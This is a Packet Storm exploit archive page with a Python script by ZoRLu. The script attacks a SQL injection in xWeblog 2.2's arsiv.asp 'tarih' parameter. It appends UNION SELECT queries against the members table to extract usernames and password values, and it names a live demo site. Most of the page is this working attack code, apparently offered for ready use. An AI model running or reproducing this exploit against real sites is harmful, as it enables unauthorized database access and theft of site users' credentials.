what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xWeblog 2.2 SQL Injection

xWeblog 2.2 SQL Injection
Posted Oct 11, 2010
Authored by ZoRLu

xWeblog version 2.2 remote SQL injection exploit that leverages arsiv.asp.

tags | exploit, remote, sql injection, asp
SHA-256 | 2beb8637b0aa0f7f69b2ae512185d2c8383071f4524d3e6accbb57361fc1a1d1

xWeblog 2.2 SQL Injection

Change Mirror Download
#!/usr/bin/env python
#-*- coding:utf-8 -*-

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit Database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Title : xWeblog v2.2 (arsiv.asp tarih) SQL Injection Exploit (.py)
# Proof : http://img408.imageshack.us/img408/7624/sqlm.jpg
# Script Down. : http://www.aspdunyasi.com/goster.asp?id=19
# Demo : http://siirdensiire.com/
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 08/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Gecmiyorum Zaman a.k :/
# Lakirdi : off ulan off / http://www.videokeyfim.net/duruyenin-gugumleri-keklik-gibi-kanadimi-suzmedim-murat-ali-doya-doya-gezmedim-bu-kara-yaziyi-kendim-yazmadim.html
'''

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system(['clear','cls'][1])
os.system('color 2')
print "_______________________________________________________________"
print " "
print " xWeblog v2.2 (arsiv.asp tarih) SQL Inj Exploit (.py) "
print " "
print " Coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "arsiv.asp"
ad = "?tarih=0000+union+select+1,AD,3,4,5,6,7,8,9,10,11,12,13+from+uyeler"
url = sitemiz + vulnfile + ad

vulnfile = "arsiv.asp"
sifre = "?tarih=0000+union+select+1,SIFRE,3,4,5,6,7,8,9,10,11,12,13+from+uyeler"
url2 = sitemiz + vulnfile + sifre

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r"<h2>(.*)([0-9a-fA-F])(.*)</h2>", veri)
if len(aliver) > 0:
print "AD : " + aliver[0][0] + aliver[0][1] + aliver[0][2]
time.sleep(2)

else:
print "Exploit failed..."
sys.exit(1)


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
sys.exit(1)

try:
veri = urllib2.urlopen(url2).read()
aliver = re.findall(r"<h2>(.*)([0-9a-fA-F])(.*)</h2>", veri)
if len(aliver) > 0:
print "\nSIFRE : " + aliver[0][0] + aliver[0][1] + aliver[0][2]

print "\nGood Job Bro!"
time.sleep(1)
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close